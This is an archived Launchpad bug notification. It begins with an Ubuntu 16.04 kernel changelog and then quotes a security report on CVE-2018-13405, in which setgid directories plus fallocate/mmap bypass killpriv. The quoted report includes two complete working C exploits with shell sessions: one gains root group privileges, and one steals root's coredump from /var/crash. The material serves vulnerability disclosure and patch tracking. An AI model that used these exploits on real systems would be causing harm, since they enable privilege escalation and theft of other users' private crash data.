group.of.nepali.translators team mailing list archive
-
group.of.nepali.translators team
-
Mailing list archive
-
Message #25684
[Bug 1779923] Re: other users' coredumps can be read via setgid directory and killpriv bypass
This bug was fixed in the package linux - 4.4.0-134.160
---------------
linux (4.4.0-134.160) xenial; urgency=medium
* linux: 4.4.0-134.160 -proposed tracker (LP: #1787177)
* locking sockets broken due to missing AppArmor socket mediation patches
(LP: #1780227)
- UBUNTU SAUCE: apparmor: fix apparmor mediating locking non-fs, unix sockets
* Backport namespaced fscaps to xenial 4.4 (LP: #1778286)
- Introduce v3 namespaced file capabilities
- commoncap: move assignment of fs_ns to avoid null pointer dereference
- capabilities: fix buffer overread on very short xattr
- commoncap: Handle memory allocation failure.
* Xenial update to 4.4.140 stable release (LP: #1784409)
- usb: cdc_acm: Add quirk for Uniden UBC125 scanner
- USB: serial: cp210x: add CESINEL device ids
- USB: serial: cp210x: add Silicon Labs IDs for Windows Update
- n_tty: Fix stall at n_tty_receive_char_special().
- staging: android: ion: Return an ERR_PTR in ion_map_kernel
- n_tty: Access echo_* variables carefully.
- x86/boot: Fix early command-line parsing when matching at end
- ath10k: fix rfc1042 header retrieval in QCA4019 with eth decap mode
- i2c: rcar: fix resume by always initializing registers before transfer
- ipv4: Fix error return value in fib_convert_metrics()
- kprobes/x86: Do not modify singlestep buffer while resuming
- nvme-pci: initialize queue memory before interrupts
- netfilter: nf_tables: use WARN_ON_ONCE instead of BUG_ON in nft_do_chain()
- ARM: dts: imx6q: Use correct SDMA script for SPI5 core
- ubi: fastmap: Correctly handle interrupted erasures in EBA
- mm: hugetlb: yield when prepping struct pages
- tracing: Fix missing return symbol in function_graph output
- scsi: sg: mitigate read/write abuse
- s390: Correct register corruption in critical section cleanup
- drbd: fix access after free
- cifs: Fix infinite loop when using hard mount option
- jbd2: don't mark block as modified if the handle is out of credits
- ext4: make sure bitmaps and the inode table don't overlap with bg
descriptors
- ext4: always check block group bounds in ext4_init_block_bitmap()
- ext4: only look at the bg_flags field if it is valid
- ext4: verify the depth of extent tree in ext4_find_extent()
- ext4: include the illegal physical block in the bad map ext4_error msg
- ext4: clear i_data in ext4_inode_info when removing inline data
- ext4: add more inode number paranoia checks
- ext4: add more mount time checks of the superblock
- ext4: check superblock mapped prior to committing
- HID: i2c-hid: Fix "incomplete report" noise
- HID: hiddev: fix potential Spectre v1
- HID: debug: check length before copy_to_user()
- x86/mce: Detect local MCEs properly
- x86/mce: Fix incorrect "Machine check from unknown source" message
- media: cx25840: Use subdev host data for PLL override
- mm, page_alloc: do not break __GFP_THISNODE by zonelist reset
- dm bufio: avoid sleeping while holding the dm_bufio lock
- dm bufio: drop the lock when doing GFP_NOIO allocation
- mtd: rawnand: mxc: set spare area size register explicitly
- dm bufio: don't take the lock in dm_bufio_shrink_count
- mtd: cfi_cmdset_0002: Change definition naming to retry write operation
- mtd: cfi_cmdset_0002: Change erase functions to retry for error
- mtd: cfi_cmdset_0002: Change erase functions to check chip good only
- netfilter: nf_log: don't hold nf_log_mutex during user access
- staging: comedi: quatech_daqp_cs: fix no-op loop daqp_ao_insn_write()
- Linux 4.4.140
* Xenial update to 4.4.139 stable release (LP: #1784382)
- xfrm6: avoid potential infinite loop in _decode_session6()
- netfilter: ebtables: handle string from userspace with care
- ipvs: fix buffer overflow with sync daemon and service
- atm: zatm: fix memcmp casting
- net: qmi_wwan: Add Netgear Aircard 779S
- net/sonic: Use dma_mapping_error()
- Revert "Btrfs: fix scrub to repair raid6 corruption"
- tcp: do not overshoot window_clamp in tcp_rcv_space_adjust()
- Btrfs: make raid6 rebuild retry more
- usb: musb: fix remote wakeup racing with suspend
- bonding: re-evaluate force_primary when the primary slave name changes
- tcp: verify the checksum of the first data segment in a new connection
- ext4: update mtime in ext4_punch_hole even if no blocks are released
- ext4: fix fencepost error in check for inode count overflow during resize
- driver core: Don't ignore class_dir_create_and_add() failure.
- btrfs: scrub: Don't use inode pages for device replace
- ALSA: hda - Handle kzalloc() failure in snd_hda_attach_pcm_stream()
- ALSA: hda: add dock and led support for HP EliteBook 830 G5
- ALSA: hda: add dock and led support for HP ProBook 640 G4
- cpufreq: Fix new policy initialization during limits updates via sysfs
- libata: zpodd: make arrays cdb static, reduces object code size
- libata: zpodd: small read overflow in eject_tray()
- libata: Drop SanDisk SD7UB3Q*G1001 NOLPM quirk
- w1: mxc_w1: Enable clock before calling clk_get_rate() on it
- x86/spectre_v1: Disable compiler optimizations over
array_index_mask_nospec()
- m68k/mm: Adjust VM area to be unmapped by gap size for __iounmap()
- serial: sh-sci: Use spin_{try}lock_irqsave instead of open coding version
- signal/xtensa: Consistenly use SIGBUS in do_unaligned_user
- usb: do not reset if a low-speed or full-speed device timed out
- 1wire: family module autoload fails because of upper/lower case mismatch.
- ASoC: dapm: delete dapm_kcontrol_data paths list before freeing it
- ASoC: cirrus: i2s: Fix LRCLK configuration
- ASoC: cirrus: i2s: Fix {TX|RX}LinCtrlData setup
- lib/vsprintf: Remove atomic-unsafe support for %pCr
- mips: ftrace: fix static function graph tracing
- branch-check: fix long->int truncation when profiling branches
- ipmi:bt: Set the timeout before doing a capabilities check
- Bluetooth: hci_qca: Avoid missing rampatch failure with userspace fw loader
- fuse: atomic_o_trunc should truncate pagecache
- fuse: don't keep dead fuse_conn at fuse_fill_super().
- fuse: fix control dir setup and teardown
- powerpc/mm/hash: Add missing isync prior to kernel stack SLB switch
- powerpc/ptrace: Fix setting 512B aligned breakpoints with
PTRACE_SET_DEBUGREG
- powerpc/ptrace: Fix enforcement of DAWR constraints
- cpuidle: powernv: Fix promotion from snooze if next state disabled
- powerpc/fadump: Unregister fadump on kexec down path.
- ARM: 8764/1: kgdb: fix NUMREGBYTES so that gdb_regs[] is the correct size
- of: unittest: for strings, account for trailing \0 in property length field
- IB/qib: Fix DMA api warning with debug kernel
- RDMA/mlx4: Discard unknown SQP work requests
- mtd: cfi_cmdset_0002: Change write buffer to check correct value
- mtd: cfi_cmdset_0002: Use right chip in do_ppb_xxlock()
- mtd: cfi_cmdset_0002: fix SEGV unlocking multiple chips
- mtd: cfi_cmdset_0002: Fix unlocking requests crossing a chip boudary
- mtd: cfi_cmdset_0002: Avoid walking all chips when unlocking.
- MIPS: BCM47XX: Enable 74K Core ExternalSync for PCIe erratum
- PCI: pciehp: Clear Presence Detect and Data Link Layer Status Changed on
resume
- MIPS: io: Add barrier after register read in inX()
- time: Make sure jiffies_to_msecs() preserves non-zero time periods
- Btrfs: fix clone vs chattr NODATASUM race
- iio:buffer: make length types match kfifo types
- scsi: qla2xxx: Fix setting lower transfer speed if GPSC fails
- scsi: zfcp: fix missing SCSI trace for result of eh_host_reset_handler
- scsi: zfcp: fix missing SCSI trace for retry of abort / scsi_eh TMF
- scsi: zfcp: fix misleading REC trigger trace where erp_action setup failed
- scsi: zfcp: fix missing REC trigger trace on terminate_rport_io early return
- scsi: zfcp: fix missing REC trigger trace on terminate_rport_io for
ERP_FAILED
- scsi: zfcp: fix missing REC trigger trace for all objects in ERP_FAILED
- scsi: zfcp: fix missing REC trigger trace on enqueue without ERP thread
- linvdimm, pmem: Preserve read-only setting for pmem devices
- md: fix two problems with setting the "re-add" device state.
- ubi: fastmap: Cancel work upon detach
- UBIFS: Fix potential integer overflow in allocation
- xfrm: skip policies marked as dead while rehashing
- backlight: as3711_bl: Fix Device Tree node lookup
- backlight: max8925_bl: Fix Device Tree node lookup
- backlight: tps65217_bl: Fix Device Tree node lookup
- mfd: intel-lpss: Program REMAP register in PIO mode
- perf tools: Fix symbol and object code resolution for vdso32 and vdsox32
- perf intel-pt: Fix sync_switch INTEL_PT_SS_NOT_TRACING
- perf intel-pt: Fix decoding to accept CBR between FUP and corresponding TIP
- perf intel-pt: Fix MTC timing after overflow
- perf intel-pt: Fix "Unexpected indirect branch" error
- perf intel-pt: Fix packet decoding of CYC packets
- media: v4l2-compat-ioctl32: prevent go past max size
- media: dvb_frontend: fix locking issues at dvb_frontend_get_event()
- nfsd: restrict rd_maxcount to svc_max_payload in nfsd_encode_readdir
- NFSv4: Fix possible 1-byte stack overflow in
nfs_idmap_read_and_verify_message
- video: uvesafb: Fix integer overflow in allocation
- Input: elan_i2c - add ELAN0618 (Lenovo v330 15IKB) ACPI ID
- xen: Remove unnecessary BUG_ON from __unbind_from_irq()
- udf: Detect incorrect directory size
- Input: elan_i2c_smbus - fix more potential stack buffer overflows
- Input: elantech - enable middle button of touchpads on ThinkPad P52
- Input: elantech - fix V4 report decoding for module with middle key
- ALSA: hda/realtek - Add a quirk for FSC ESPRIMO U9210
- Btrfs: fix unexpected cow in run_delalloc_nocow
- spi: Fix scatterlist elements size in spi_map_buf
- block: Fix transfer when chunk sectors exceeds max
- dm thin: handle running out of data space vs concurrent discard
- cdc_ncm: avoid padding beyond end of skb
- Bluetooth: Fix connection if directed advertising and privacy is used
- Linux 4.4.139
* Support AverMedia DVD EZMaker 7 USB video capture dongle (LP: #1620762) //
Xenial update to 4.4.139 stable release (LP: #1784382)
- media: cx231xx: Add support for AverMedia DVD EZMaker 7
* vfio/pci: cannot assign a i40e pf device to a vm using vfio-pci
(LP: #1779830)
- vfio/pci: Hide broken INTx support from user
* Kernel error "task zfs:pid blocked for more than 120 seconds" (LP: #1781364)
- SAUCE: (noup) zfs to 0.6.5.6-0ubuntu25
* Allow multiple mounts of zfs datasets (LP: #1759848)
- SAUCE: Allow mounting datasets more than once (LP: #1759848)
* CVE-2018-12233
- jfs: Fix inconsistency between memory allocation and ea_buf->max_size
* Redpine: Observed kernel panic while running wireless tests in regression
mode (LP: #1773410) // Redpine: Observed kernel panic while running soft-ap
tests (LP: #1777850)
- SAUCE: Redpine: improve cancel_hw_scan handling to fix kernel panic
* [HMS] Upgrades to Support SocketCAN over USB on Dell IoT 300x Gateways
(LP: #1783241)
- SAUCE: (no-up) upgrade IXXAT USB SocketCAN driver
* CVE-2018-13094
- xfs: don't call xfs_da_shrink_inode with NULL bp
* other users' coredumps can be read via setgid directory and killpriv bypass
(LP: #1779923) // CVE-2018-13405
- Fix up non-directory creation in SGID directories
* snapcraft.yaml: missing ubuntu-retpoline-extract-one script breaks the build
(LP: #1782116)
- snapcraft.yaml: copy retpoline-extract-one to scripts before build
* Enable basic support for Solarflare 8000 series NIC (LP: #1783152)
- sfc: make TSO version a per-queue parameter
- sfc: Add PCI ID for Solarflare 8000 series 10/40G NIC
* Redpine: Observed kernel panic while running wireless regressions tests
(LP: #1777858)
- SAUCE: Redpine: improve kernel thread handling to fix kernel panic
* Xenial update to 4.4.138 stable release (LP: #1777389)
- x86: Remove unused function cpu_has_ht_siblings()
- x86/cpufeature: Remove unused and seldomly used cpu_has_xx macros
- x86/fpu: Disable AVX when eagerfpu is off
- x86/fpu: Revert ("x86/fpu: Disable AVX when eagerfpu is off")
- x86/fpu: Hard-disable lazy FPU mode
- af_key: Always verify length of provided sadb_key
- x86/crypto, x86/fpu: Remove X86_FEATURE_EAGER_FPU #ifdef from the crc32c
code
- gpio: No NULL owner
- Clarify (and fix) MAX_LFS_FILESIZE macros
- serial: samsung: fix maxburst parameter for DMA transactions
- vmw_balloon: fixing double free when batching mode is off
- Input: goodix - add new ACPI id for GPD Win 2 touch screen
- crypto: vmx - Remove overly verbose printk from AES init routines
- Linux 4.4.138
* Redpine: wifi-ap stopped working after restart (LP: #1773400)
- SAUCE: Redpine: fix soft-ap invisible issue
* Xenial update to 4.4.137 stable release (LP: #1777063)
- tpm: do not suspend/resume if power stays on
- tpm: self test failure should not cause suspend to fail
- mmap: introduce sane default mmap limits
- mmap: relax file size limit for regular files
- kconfig: Avoid format overflow warning from GCC 8.1
- xfs: fix incorrect log_flushed on fsync
- drm: set FMODE_UNSIGNED_OFFSET for drm files
- brcmfmac: Fix check for ISO3166 code
- bnx2x: use the right constant
- dccp: don't free ccid2_hc_tx_sock struct in dccp_disconnect()
- enic: set DMA mask to 47 bit
- ip6mr: only set ip6mr_table from setsockopt when ip6mr_new_table succeeds
- ipv4: remove warning in ip_recv_error
- isdn: eicon: fix a missing-check bug
- netdev-FAQ: clarify DaveM's position for stable backports
- net/packet: refine check for priv area size
- net: usb: cdc_mbim: add flag FLAG_SEND_ZLP
- packet: fix reserve calculation
- qed: Fix mask for physical address in ILT entry
- net/mlx4: Fix irq-unsafe spinlock usage
- team: use netdev_features_t instead of u32
- rtnetlink: validate attributes in do_setlink()
- net: phy: broadcom: Fix bcm_write_exp()
- net: metrics: add proper netlink validation
- Linux 4.4.137
* Xenial update to 4.4.136 stable release (LP: #1776177)
- arm64: lse: Add early clobbers to some input/output asm operands
- powerpc/64s: Clear PCR on boot
- USB: serial: cp210x: use tcflag_t to fix incompatible pointer type
- sh: New gcc support
- xfs: detect agfl count corruption and reset agfl
- Input: elan_i2c_smbus - fix corrupted stack
- tracing: Fix crash when freeing instances with event triggers
- selinux: KASAN: slab-out-of-bounds in xattr_getsecurity
- cfg80211: further limit wiphy names to 64 bytes
- rtlwifi: rtl8192cu: Remove variable self-assignment in rf.c
- ASoC: Intel: sst: remove redundant variable dma_dev_name
- irda: fix overly long udelay()
- tcp: avoid integer overflows in tcp_rcv_space_adjust()
- i2c: rcar: make sure clocks are on when doing clock calculation
- i2c: rcar: rework hw init
- i2c: rcar: remove unused IOERROR state
- i2c: rcar: remove spinlock
- i2c: rcar: refactor setup of a msg
- i2c: rcar: init new messages in irq
- i2c: rcar: don't issue stop when HW does it automatically
- i2c: rcar: check master irqs before slave irqs
- i2c: rcar: revoke START request early
- dmaengine: usb-dmac: fix endless loop in usb_dmac_chan_terminate_all()
- iio:kfifo_buf: check for uint overflow
- MIPS: ptrace: Fix PTRACE_PEEKUSR requests for 64-bit FGRs
- MIPS: prctl: Disallow FRE without FR with PR_SET_FP_MODE requests
- scsi: scsi_transport_srp: Fix shost to rport translation
- stm class: Use vmalloc for the master map
- hwtracing: stm: fix build error on some arches
- drm/i915: Disable LVDS on Radiant P845
- Kbuild: change CC_OPTIMIZE_FOR_SIZE definition
- [Config] Add CONFIG_CC_OPTIMIZE_FOR_PERFORMANCE=y
- fix io_destroy()/aio_complete() race
- mm: fix the NULL mapping case in __isolate_lru_page()
- sparc64: Fix build warnings with gcc 7.
- Linux 4.4.136
* Xenial update to 4.4.135 stable release (LP: #1776158)
- Revert "vti4: Don't override MTU passed on link creation via IFLA_MTU"
- Linux 4.4.135
-- Kleber Sacilotto de Souza <kleber.souza@xxxxxxxxxxxxx> Wed, 15 Aug
2018 13:51:11 +0000
** Changed in: linux (Ubuntu Xenial)
Status: Fix Committed => Fix Released
--
You received this bug notification because you are a member of नेपाली
भाषा समायोजकहरुको समूह, which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1779923
Title:
other users' coredumps can be read via setgid directory and killpriv
bypass
Status in linux package in Ubuntu:
In Progress
Status in linux source package in Trusty:
Fix Committed
Status in linux source package in Xenial:
Fix Released
Status in linux source package in Bionic:
Fix Released
Status in linux source package in Cosmic:
In Progress
Bug description:
Note: I am both sending this bug report to security@xxxxxxxxxx and filing it in
the Ubuntu bugtracker because I can't tell whether this counts as a kernel bug
or as a Ubuntu bug. You may wish to talk to each other to determine the best
place to fix this.
I noticed halfdog's old writeup at
https://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/
, describing essentially the following behavior in combination with a
trick for then writing to the resulting file without triggering the
killpriv logic:
=============
user@debian:~/sgid_demo$ sudo mkdir -m03777 dir
user@debian:~/sgid_demo$ cat > demo.c
#include <fcntl.h>
int main(void) { open("dir/file", O_RDONLY|O_CREAT, 02755); }
user@debian:~/sgid_demo$ gcc -o demo demo.c
user@debian:~/sgid_demo$ ./demo
user@debian:~/sgid_demo$ ls -l dir/file
-rwxr-sr-x 1 user root 0 Jun 25 22:03 dir/file
=============
Two patches for this were proposed on LKML back then:
"[PATCH 1/2] fs: Check f_cred instead of current's creds in
should_remove_suid()"
https://lore.kernel.org/lkml/9318903980969a0e378dab2de4d803397adcd3cc.1485377903.git.luto@xxxxxxxxxx/
"[PATCH 2/2] fs: Harden against open(..., O_CREAT, 02777) in a setgid directory"
https://lore.kernel.org/lkml/826ec4aab64ec304944098d15209f8c1ae65bb29.1485377903.git.luto@xxxxxxxxxx/
However, as far as I can tell, neither of them actually landed.
You can also bypass the killpriv logic with fallocate() and mmap() -
fallocate() permits resizing the file without triggering killpriv,
mmap() permits writing without triggering killpriv (the mmap part is mentioned
at
https://lore.kernel.org/lkml/CAGXu5jLu6OGkQUgqRcOyQ6DABOwZ9HX3fUQ+-zC7NjLukGKnVw@xxxxxxxxxxxxxx/
):
=============
user@debian:~/sgid_demo$ sudo mkdir -m03777 dir
user@debian:~/sgid_demo$ cat fallocate.c
#define _GNU_SOURCE
#include <stdlib.h>
#include <fcntl.h>
#include <err.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <string.h>
int main(void) {
int src_fd = open("/usr/bin/id", O_RDONLY);
if (src_fd == -1)
err(1, "open 2");
struct stat src_stat;
if (fstat(src_fd, &src_stat))
err(1, "fstat");
int src_len = src_stat.st_size;
char *src_mapping = mmap(NULL, src_len, PROT_READ, MAP_PRIVATE, src_fd, 0);
if (src_mapping == MAP_FAILED)
err(1, "mmap 2");
int fd = open("dir/file", O_RDWR|O_CREAT|O_EXCL, 02755);
if (fd == -1)
err(1, "open");
if (fallocate(fd, 0, 0, src_len))
err(1, "fallocate");
char *mapping = mmap(NULL, src_len, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
if (mapping == MAP_FAILED)
err(1, "mmap");
memcpy(mapping, src_mapping, src_len);
munmap(mapping, src_len);
close(fd);
close(src_fd);
execl("./dir/file", "id", NULL);
err(1, "execl");
}
user@debian:~/sgid_demo$ gcc -o fallocate fallocate.c
user@debian:~/sgid_demo$ ./fallocate
uid=1000(user) gid=1000(user) egid=0(root)
groups=0(root),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),116(scanner),121(wireshark),1000(user)
=============
sys_copy_file_range() also looks as if it bypasses killpriv on
supported filesystems, but I haven't tested that one so far.
On Ubuntu 18.04 (bionic), /var/crash is mode 03777, group "whoopsie", and
contains group-readable crashdumps in some custom format, so you can use this
issue to steal other users' crashdumps:
=============
user@ubuntu-18-04-vm:~$ ls -l /var/crash
total 296
-rw-r----- 1 user whoopsie 16527 Jun 25 22:27 _usr_bin_apport-unpack.1000.crash
-rw-r----- 1 root whoopsie 50706 Jun 25 21:51 _usr_bin_id.0.crash
-rw-r----- 1 user whoopsie 51842 Jun 25 21:42 _usr_bin_id.1000.crash
-rw-r----- 1 user whoopsie 152095 Jun 25 21:43 _usr_bin_strace.1000.crash
-rw-r----- 1 root whoopsie 18765 Jun 26 00:42 _usr_bin_xattr.0.crash
user@ubuntu-18-04-vm:~$ cat /var/crash/_usr_bin_id.0.crash
cat: /var/crash/_usr_bin_id.0.crash: Permission denied
user@ubuntu-18-04-vm:~$ cat fallocate.c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <err.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <string.h>
int main(int argc, char **argv) {
if (argc != 2) {
printf("usage: ./fallocate <file_to_read>");
return 1;
}
int src_fd = open("/bin/cat", O_RDONLY);
if (src_fd == -1)
err(1, "open 2");
struct stat src_stat;
if (fstat(src_fd, &src_stat))
err(1, "fstat");
int src_len = src_stat.st_size;
char *src_mapping = mmap(NULL, src_len, PROT_READ, MAP_PRIVATE, src_fd, 0);
if (src_mapping == MAP_FAILED)
err(1, "mmap 2");
unlink("/var/crash/privileged_cat"); /* in case we've already run before */
int fd = open("/var/crash/privileged_cat", O_RDWR|O_CREAT|O_EXCL, 02755);
if (fd == -1)
err(1, "open");
if (fallocate(fd, 0, 0, src_len))
err(1, "fallocate");
char *mapping = mmap(NULL, src_len, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
if (mapping == MAP_FAILED)
err(1, "mmap");
memcpy(mapping, src_mapping, src_len);
munmap(mapping, src_len);
close(fd);
execl("/var/crash/privileged_cat", "cat", argv[1], NULL);
err(1, "execl");
}
user@ubuntu-18-04-vm:~$ gcc -o fallocate fallocate.c
user@ubuntu-18-04-vm:~$ ./fallocate /var/crash/_usr_bin_id.0.crash > /var/crash/_usr_bin_id.0.crash.stolen
user@ubuntu-18-04-vm:~$ ls -l /var/crash
total 384
-rwxr-sr-x 1 user whoopsie 35064 Jul 3 19:22 privileged_cat
-rw-r----- 1 user whoopsie 16527 Jun 25 22:27 _usr_bin_apport-unpack.1000.crash
-rw-r----- 1 root whoopsie 50706 Jun 25 21:51 _usr_bin_id.0.crash
-rw-r--r-- 1 user whoopsie 50706 Jul 3 19:22 _usr_bin_id.0.crash.stolen
-rw-r----- 1 user whoopsie 51842 Jun 25 21:42 _usr_bin_id.1000.crash
-rw-r----- 1 user whoopsie 152095 Jun 25 21:43 _usr_bin_strace.1000.crash
-rw-r----- 1 root whoopsie 18765 Jun 26 00:42 _usr_bin_xattr.0.crash
user@ubuntu-18-04-vm:~$ mkdir root_crash_unpacked
user@ubuntu-18-04-vm:~$ # work around bug in apport-unpack
user@ubuntu-18-04-vm:~$ sed -i 's|^UserGroups: $|UserGroups: 0|' /var/crash/_usr_bin_id.0.crash.stolen
user@ubuntu-18-04-vm:~$ apport-unpack /var/crash/_usr_bin_id.0.crash.stolen root_crash_unpacked/
user@ubuntu-18-04-vm:~$ file root_crash_unpacked/CoreDump
root_crash_unpacked/CoreDump: ELF 64-bit LSB core file x86-64, version 1 (SYSV), SVR4-style, from 'id', real uid: 0, effective uid: 0, real gid: 0, effective gid: 0, execfn: '/usr/bin/id', platform: 'x86_64'
=============
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1779923/+subscriptions
